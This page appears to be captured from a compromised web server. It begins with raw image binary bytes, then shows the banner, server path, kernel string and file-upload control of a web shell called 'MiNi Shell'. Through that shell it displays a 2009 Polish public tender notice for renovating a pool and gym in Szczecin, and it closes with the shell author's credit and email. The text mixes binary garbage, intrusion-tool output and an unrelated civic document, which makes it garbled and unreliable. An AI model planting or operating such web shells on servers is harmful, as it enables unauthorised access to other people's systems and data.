JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090323/53439-N-2009.html

<p class="kh_header"><b>Szczecin: Remont budynku basenu i Sali gimnastycznej (pawilon E) w Centrum Kształcenia Sportowego przy ul. Rydla 49 w Szczecinie (dawniej Zespół Szkół Ogólnobudowlanych nr 8 w Szczecinie) - etap 1</b><br>
<b>Numer ogłoszenia: 53439 - 2009; data zamieszczenia: 23.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Szczecin , ul. Armii Krajowej 1, 70-456 Szczecin, woj. zachodniopomorskie, tel. 091 4245102, faks 091 4245104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku basenu i Sali gimnastycznej (pawilon E) w Centrum Kształcenia Sportowego przy ul. Rydla 49 w Szczecinie (dawniej Zespół Szkół Ogólnobudowlanych nr 8 w Szczecinie) - etap 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Remont budynku basenu i Sali gimnastycznej (pawilon E) w Centrum Kształcenia Sportowego przy ul. Rydla 49 w Szczecinie (dawniej Zespół Szkół Ogólnokształcących nr 8 w Szczecinie) - etap 1.
Kod CPV 45 00 00 00 - 7 - roboty budowlane.
2.Zakres zamówienia obejmuje wykonanie wszystkich prac prowadzących do osiągnięcia stanu zgodnego z dokumentacją projektową oraz specyfikacjami technicznymi wykonania i odbioru robót budowlanych pod nazwą Remont budynku basenu i sali gimnastycznej (pawilon E) Zespół Szkół Ogólnokształcących nr 8 przy ul. Rydla 49 w Szczecinie opracowanymi w 2008 roku przez METROPOLIS - BIURO ARCHITEKTONICZNE  -REMIGIUSZ SMOLIK, 70-240 Szczecin, ul. Narutowicza 12 oraz wszystkie prace jakie z technicznego punktu widzenia są konieczne do prawidłowego wykonania oraz przekazania do użytkowania zadania pod nazwą Remont budynku basenu i sali gimnastycznej (pawilon E ) w Centrum Kształcenia Sportowego przy ul. Rydla 49 w Szczecinie ( dawniej Zespół Szkół Ogólnokształcących nr 8 w Szczecinie) - etap 1, a także niżej wymienione prace:
a) roboty przygotowawcze na terenie objętym przedmiotem zamówienia, roboty rozbiórkowe i porządkowe,
b) roboty związane z zagospodarowaniem placu budowy, utrzymaniem zaplecza budowy (naprawy, doprowadzenie wody, energii elektrycznej, telefon, dozorowanie), wszelkie prace porządkowe związane z zakończeniem przedmiotu zamówienia,
c)roboty związane z usunięciem gruzu i odpadów z terenu budowy i ich zagospodarowaniem (wywóz z terenu budowy, składowanie na wysypisku, utylizacja itp.),
d) dostarczenie, montaż i demontaż i wykorzystanie rusztowań i wszelkiego rodzaju sprzętu , narzędzi i urządzeń koniecznych do użycia w celu wykonania przedmiotu umowy,
e) zajęcie pasa drogowego (jezdni i chodnika, pobocza), jeżeli zajdzie taka konieczność dla zrealizowania przedmiotu umowy, 
f)wykonanie wszelkich wymaganych przepisami badań, sprawdzeń, pomiarów w tym pomiarów geodezyjnych oraz sporządzenia wymaganych przepisami protokołów, inwentaryzacji w tym inwentaryzacji i map geodezyjnych (wraz ze zgłoszeniem do Państwowego Zasobu Geodezyjnego) , itp 
g) wszelkie inne roboty podstawowe, pomocnicze i roboty towarzyszące, konieczne do wykonania w celu zrealizowania i oddania do użytkowania przedmiotu zamówienia
3.  Zakres prac określają
1) Dokumentacja projektowa dostarczona przez Zamawiającego, na którą składa się
a) projekt wykonawczy - p.w. , architektura -część opisowa
b) projekt wykonawczy - p.w. , architektura -część rysunkowa
c) projekt wykonawczy - p.w. ,konstrukcja,
d) opinia geotechniczna do celów projektowych,
e) projekt wykonawczy - p.w. , wewnętrzne instalacje sanitarne,
f) projekt wykonawczy - p.w. , technologia uzdatniania wody basenowej dla basenu pływackiego oraz wanny z hydromasażem,
g) projekt wykonawczy - p.w. ,instalacje elektryczne wewnętrzne,
h) projekt wykonawczy - p.w. , nagłośnienie,
i) przedmiar robót - branża budowlana,
j) przedmiar robót - branża wyposażenie,
k) przedmiar robót - branża sanitarna,
l) przedmiar robót - branża technologia wody,
m) przedmiar robót - branża elektryczna,
n) przedmiar robót - branża telekomunikacyjna,
o) informacja dotycząca bezpieczeństwa i ochrony zdrowia,
Wszystkie ww. dokumenty stanowią załącznik nr 7 do siwz.
2) Specyfikacje techniczne wykonania i odbioru robót budowlanych dostarczone przez  Zamawiającego, na które składają się
a) specyfikacja techniczna wykonania i odbioru robót budowlanych  ST.0.0
b) specyfikacja techniczna wykonania i odbioru robót budowlanych  ST.-1.0
c) specyfikacja techniczna wykonania i odbioru robót budowlanych  ST.-2.0
d) specyfikacja techniczna wykonania i odbioru robót budowlanych  ST.3.0
e) specyfikacja techniczna wykonania i odbioru robót budowlanych  ST-4.0
f)  specyfikacja techniczna wykonania i odbioru robót budowlanych  - wewnętrzne instalacje sanitarne
g) specyfikacja techniczna wykonania i odbioru robót budowlanych - technologia uzdatniania wody basenu pływackiego oraz wanny z hydromasażem
h) specyfikacja techniczna wykonania i odbioru robót budowlanych  ST E 1.0.0
i)  specyfikacja techniczna wykonania i odbioru robót budowlanych - nagłośnienie 
Wszystkie ww. dokumenty stanowią załącznik nr 8 do siwz.
UWAGA 
DLA ETAPU 1 z zakresu prac opisanego w wymienionej wyżej dokumentacji projektowej oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych wyłączono następujące roboty budowlane, których nie należy uwzględniać i wyceniać w ofercie:
1) Wyposażenia obiektu 
 W przedmiarze robót - branża wyposażenie, wymienionym wyżej w punkcie 1j) nie należy wyceniać pozycji od poz.1 do poz. 14 (dział 1 Wyposażenie, CPV 45212200-8 ,)
2) Dźwigu wewnętrznego osobowego- 1 sztuka  i podnośnika zewnętrznego nożycowego - 1 sztuka  
W przedmiarze robót - branża budowlana, a wymienionym wyżej w punkcie 1i) nie należy wyceniać pozycji od poz.179 do poz. 180  ( dział 16  CPV 45313100-3  Dźwigi wewnętrzne i zewnętrzne)
W projekcie  wykonawczym - p.w. , architektura -część opisowa , wymienionym wyżej w punkcie 1a) wewnętrzny dźwig osobowy opisano na stronie nr 7,  a jego specyfikację podano w załączniku nr 3 na stronach od str. 99 do str.105, natomiast podnośnik zewnętrzny nożycowy opisano na stronie 9, a jego specyfikację podano w załączniku nr 4 na stronie 106 
3) Elewacji budynku basenu i sali gimnastycznej
W przedmiarze robót - branża budowlana, wymienionym wyżej w punkcie 1i) nie należy wyceniać pozycji od poz.187 do poz. 199  ( dział 18  CPV 45450000-6 Elewacje)
4) Opraw oświetleniowych
W przedmiarze robót - branża elektryczna, wymienionym wyżej w punkcie 1m) nie należy wyceniać pozycji od poz.87 do poz.101 ( dział 4 Oprawy oświetleniowe - CPV 45315100-9 - Instalacyjne roboty elektryczne ) 
   
4.   Organizacja budowy:
1) organizacja zaplecza budowy i zaplecza socjalnego dla własnych potrzeb - zgodnie z obowiązującymi przepisami,
2) odpowiednie oznakowanie i zabezpieczenie miejsc prowadzenia robót,
3) uporządkowanie terenu po zakończeniu robót: odtworzenie ewentualnie uszkodzonych nawierzchni lub obiektów sąsiadujących do stanu z dnia przejęcia frontu robót.
5.  Warunki wykonawstwa
1)Wszystkie roboty należy wykonać zgodnie z wiedzą techniczną, zasadami sztuki budowlanej, obowiązującymi normami i przepisami w tym przepisami prawa budowlanego,
2)Kierowanie robotami będzie sprawowane przez pracowników Wykonawcy posiadających odpowiednie uprawnienia budowlane. Zmiana osób sprawujących samodzielne funkcje techniczne na budowie ( kierownik budowy i kierownicy robót ), w stosunku do wykazu zawartego w ofercie, a także w trakcie trwania budowy, wymaga każdorazowo akceptacji i zatwierdzenia Zamawiającego.
3)Przy wykonywaniu robót budowlanych można stosować jedynie wyroby budowlane dopuszczone do obrotu i powszechnego lub jednostkowego zastosowania w budownictwie . 

6. Podane w dokumentacji projektowej i specyfikacjach technicznych wykonania i odbioru robót  budowlanych nazwy własne są przykładowe. Dopuszcza się materiały, urządzenia i technologie równoważne w stosunku do przywołanych w projekcie. O tym czy dany materiał, urządzenie czy technologia jest lub nie jest równoważna decyduje projektant w uzgodnieniu z Zamawiającym po oficjalnym zapytaniu, do którego załączyć należy komplet aktualnych dokumentów ( kopie atestów, certyfikatów itp.),poświadczone za zgodność z oryginałem i stanem faktycznym. 
7. Wynagrodzenie Wykonawcy
1)Za wykonanie przedmiotu Umowy przysługuje Wykonawcy wynagrodzenie ryczałtowe zgodne z ofertą cenową.
2)Nie przewiduje się zaliczek na poczet wydatków Wykonawcy, związanych z realizacją przedmiotu zamówienia.
8. Rozliczenia i płatności
Rozliczenie i realizacja płatności nastąpi zgodnie z § 13 Umowy.
9. Klauzule dodatkowe
1)Wykonawca jest wytwarzającym odpady w rozumieniu przepisów ustawy o odpadach z dnia 27 kwietnia 2001 roku z późniejszymi zmianami. Wykonawca w trakcie realizacji zamówienia ma obowiązek udokumentować Zamawiającemu sposób gospodarowania odpadami, jako warunek dokonania odbioru realizowanego Zamówienia. 
2)Sprawy sporne  rozpatrywana będą przez właściwy Sąd w Szczecinie.

10. Odbiór końcowy
Przedmiotem odbioru końcowego będzie przedmiot zamówienia.
11. Ubezpieczenia
Wykonawca w dniu podpisania umowy zobowiązuje się dostarczyć Zamawiającemu Polisę ubezpieczeniową z tytułu Odpowiedzialności Cywilnej na okres obejmujący czas realizacji przedmiotu zamówienia. Suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia  nie może być niższa niż 9.800.000,00 złotych ( dziewięć milionów osiemset tysięcy złotych)
12. W przypadku zakupu dokumentacji w wersji drukowanej - cena za komplet wynosi 1 500 zł brutto..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium należy wnieść w wysokości 20 000 zł  (słownie dwadzieścia tysięcy złotych) w terminie do dnia 20.04.2009 r. do godziny 10.30 Decyduje data wpływu środków do zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5)spełniają następujące warunki dodatkowe:
a) dysponują lub będą dysponować  osobami zdolnymi do wykonania zamówienia.
Zamawiający uzna, że wykonawca dysponuje osobami zdolnymi do wykonania
zamówienia, jeżeli wykaże minimum :
- 1 osobę posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń. Osoba ta musi przynależeć do właściwej izby samorządu zawodowego.
- 1 osobę posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych wbudownictwie tj. do kierowania robotami budowlanymi w specjalności sanitarnej bez ograniczeń. Osoba ta musi przynależeć do właściwej izby samorządy zawodowego.
- 1 osobę posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności elektrycznej bez ograniczeń. Osoba ta musi przynależeć do właściwej izby samorządy zawodowego.
b) wykonali należycie w okresie ostatnich pięciu lat przed dniem wszczęcia
postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie minimum dwie prace podobne do objętych
przedmiotem zamówienia. 
Za prace podobne zamawiający uzna prace polegające na wykonaniu robót
budowlanych o wartości nie mniejszej niż 2 000 000 złotych brutto każda.
Pod określeniem roboty budowlane należy rozumieć - roboty branży ogólnobudowlanej lub roboty branży sanitarnej lub roboty branży elektrycznej lub roboty wszystkich branż razem bez określania udziału poszczególnych rodzajów robót w całkowitej wartości pracy podobnej. 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy z wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1)Oświadczenie wykonawcy, według wzoru, stanowiącego załącznik nr 2 do niniejszej siwz o spełnianiu warunków określonych w art. 22 ust. 1 ustawy,
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik 
w imieniu wykonawców składających ofertę wspólną.
2)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
3)Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, według wzoru, stanowiącego załącznik nr 3 do niniejszej siwz,  
W przypadku składania oferty wspólnej wykonawcy składają jeden wspólny wykaz osób którymi dysponują lub będą dysponować.
4)Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa  w ppkt 3, wykonawca wskazał osoby, którymi będzie dysponował.
5)Dokumenty stwierdzające, że osoby, o których mowa w ppkt 3), posiadają wymagane uprawnienia tj stwierdzenie przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń oraz aktualne zaświadczenie o przynależności tej osoby do właściwej izby samorządu zawodowego, stwierdzenie przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności sanitarnej bez ograniczeń, oraz aktualne zaświadczenie o przynależności tej osoby do właściwej izby samorządu zawodowego,
6)Wykaz wykonanych robót budowlanych (prac podobnych) w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania według wzoru, stanowiącego załącznik nr 4 do niniejszej siwz oraz dokumenty - np. referencje potwierdzające, że roboty te zostały wykonane należycie, 
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz.


3.	Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	Zbiorcze zestawienie kosztów robót z podaniem cen, których suma musi być równa cenie oferty, wg wzoru stanowiącego załącznik nr 6 do siwz..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.um.szczecin.pl/UMSzczecinBIP/chapter_11710.asp.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miasto Szczecin, Urząd Miasta Szczecin - Biuro ds. Zamówień Publicznych
Pl. Armii Krajowej 1
70-456 Szczecin
(pok. nr 397).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 10:30, miejsce: Gmina Miasto Szczecin, Urząd Miasta Szczecin - Biuro ds. Zamówień Publicznych
Pl. Armii Krajowej 1
70-456 Szczecin
(pok. nr 397).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com